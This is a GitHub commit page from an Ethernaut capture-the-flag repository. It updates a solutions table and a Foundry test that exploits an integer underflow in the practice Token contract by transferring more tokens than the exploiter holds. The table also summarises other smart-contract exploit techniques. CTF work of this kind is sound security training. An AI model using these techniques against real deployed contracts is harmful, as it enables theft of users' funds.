Skip to content

Commit

Permalink
fix: Ethernaut lvl 5
Browse files Browse the repository at this point in the history
  • Loading branch information
@leovct
leovct committed Sep 24, 2024
1 parent 44eac71 commit 24e138c
Show file tree
Hide file tree
Showing 3 changed files with 12 additions and 5 deletions.
2 changes: 1 addition & 1 deletion doc/EthernautCTF.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
| 02 | [Fallout](../src/EthernautCTF/Fallout.sol) || [FalloutExploit](../test/EthernautCTF/FalloutExploit.t.sol) | Typo in the constructor name. |
| 03 | [CoinFlip](../src/EthernautCTF/CoinFlip.sol) || [CoinFlipExploit](../test/EthernautCTF/CoinFlipExploit.t.sol) | The contract relies on `block.number` to generate a random value. |
| 04 | [Telephone](../src/EthernautCTF/Telephone.sol) || [TelephoneExploit](../test/EthernautCTF/TelephoneExploit.t.sol) | Use a helper contract to make sure `tx.origin` and `msg.sender` are different. |
| 05 | [Token](../src/EthernautCTF/Token.sol) | | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. |
| 05 | [Token](../src/EthernautCTF/Token.sol) | | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. |
| 06 | [Delegation](../src/EthernautCTF/Delegation.sol) || [DelegationExploit](../test/EthernautCTF/DelegationExploit.t.sol) | Make use of the `delegatecall` to overwrite the storage of the main contract. |
| 07 | [Force](../src/EthernautCTF/Force.sol) || [ForceExploit](../test/EthernautCTF/ForceExploit.t.sol) | Create a contract, fund it with some ether and use the `selfdestruct` method to send the contract balance to any other contract (e.g. a contract without any implementation). |
| 08 | [Vault](../src/EthernautCTF/Vault.sol) || [VaultExploit](../test/EthernautCTF/VaultExploit.t.sol) | Read the password from the contract storage. |
Expand Down
2 changes: 1 addition & 1 deletion package.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
"check": "pnpm exec prettier --plugin prettier-plugin-solidity --check .",
"lint": "pnpm exec prettier --plugin prettier-plugin-solidity --write .",
"build": "forge build --sizes --skip Token",
"exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation' --no-match-path test/EthernautCTF/TokenExploit.t.sol"
"exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation'"
},
"keywords": [],
"author": "@leovct",
Expand Down
13 changes: 10 additions & 3 deletions test/EthernautCTF/TokenExploit.t.sol
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,13 @@
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.6.0;

// Fix the following compiler error (specific to 0.6.x)
// Error: Unimplemented feature (/Users/distiller/project/libsolidity/codegen/CompilerUtils.cpp:420):Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented.
// UnimplementedFeatureError: Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented.
// - https://github.com/leovct/puzzl3s/issues/25
// - https://github.com/foundry-rs/foundry/issues/4376
pragma experimental ABIEncoderV2;

import '../../src/EthernautCTF/Token.sol';
import '@forge-std/Test.sol';
import '@forge-std/console2.sol';
Expand All @@ -21,15 +28,15 @@ contract TokenExploit is Test {
}

function testExploit() public {
uint256 balance = target.balanceOf(deployer);
uint256 balance = target.balanceOf(exploiter);
console2.log('Balance: %d', balance);
assertEq(balance, 0);
assertEq(balance, 20);

vm.startPrank(exploiter);
assertTrue(target.transfer(address(0x0), 21));
vm.stopPrank();

balance = target.balanceOf(deployer);
balance = target.balanceOf(exploiter);
console2.log('Balance: %d', balance);
assertTrue(balance >= 10000);
}
Expand Down

0 comments on commit 24e138c

Please sign in to comment.